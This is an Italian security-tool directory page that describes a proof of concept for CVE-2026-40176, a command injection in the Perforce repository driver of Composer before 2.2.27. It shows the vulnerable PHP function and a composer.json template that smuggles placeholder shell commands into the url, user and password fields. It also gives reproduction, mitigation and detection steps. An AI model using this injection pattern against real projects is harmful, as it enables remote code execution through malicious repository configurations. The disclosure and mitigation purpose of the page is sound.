Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlSviluppo Payload
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Proof-of-concept che dimostra l'iniezione di comandi nel driver Perforce di Composer (CVE-2026-40176), consentendo l'esecuzione remota di codice tramite una configurazione di repository appositamente predisposta.

Vedi Repository
135 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-40176

Esecuzione Remota di Codice (RCE) nel Repository Perforce di Composer

Composer Version Severity Type


📋 Riepilogo

Vulnerabilità di Iniezione di Comandi nel driver del repository Perforce di Composer che consente l'Esecuzione Remota di Codice (RCE) tramite una validazione insufficiente dell'input nell'elaborazione dell'URL del repository.


🎯 Dettagli della Vulnerabilità

ProprietàValore
ID CVECVE-2026-40176
Versioni InteressateComposer < 2.2.27
Tipo di VulnerabilitàIniezione di Comandi
Vettore di AttaccoConfigurazione di repository dannosa
ImpattoEsecuzione di codice arbitrario
Punteggio CVSSAlto/Critico

🔍 Descrizione Tecnica

La vulnerabilità esiste nel modo in cui Composer elabora i repository quando il tipo è perforce. Il parametro non viene adeguatamente sanificato prima di essere passato ai comandi di shell, consentendo agli aggressori di iniettare comandi di sistema arbitrari.


    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Tutto ciò non veniva escapato correttamente, consentendo a un aggressore di iniettare comandi creando un payload dannoso per tutti i campi con il tipo perforce.

Schema di Codice Vulnerabile:

{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Prova di Concetto

Questo repository contiene una prova di concetto funzionante che dimostra la vulnerabilità.

Struttura del Progetto

CVE-2026-40176/
├── composer.json              # Configurazione del repository Perforce dannoso
├── vuln-composer.phar         # Composer 2.2.26 (VULNERABILE)
├── patched-composer.phar      # Composer 2.2.27 (CORRETTO)
└── README.md                  # Questo file

Passaggi per la Riproduzione

1. Clonare il repository

git clone <repository-url>
cd CVE-2026-40176

2. Verificare le versioni di Composer

php vuln-composer.phar --version
# Output: Composer version 2.2.26

php patched-composer.phar --version
# Output: Composer version 2.2.27

3. Testare la versione vulnerabile

php vuln-composer.phar install
# OPPURE
php vuln-composer.phar update

4. Verificare lo sfruttamento

ls -la /tmp/pwned

5. Testare la versione corretta (dovrebbe fallire)

rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# Il file NON dovrebbe esistere (la vulnerabilità è stata corretta)

🛡️ Mitigazione

Azioni Immediati

  1. Aggiornare Composer alla versione 2.2.27 o successiva:

    composer self-update --2.2.27
    # OPPURE
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Esaminare tutti i file composer.json per configurazioni di repository sconosciute o sospette

  3. Verificare la supply chain - Controllare se alcune dipendenze fanno riferimento a repository non attendibili

Rilevamento

# Controllare la versione di Composer
composer --version

# Cercare repository Perforce nei propri progetti
grep -r "perforce" */composer.json
Scarica lo strumento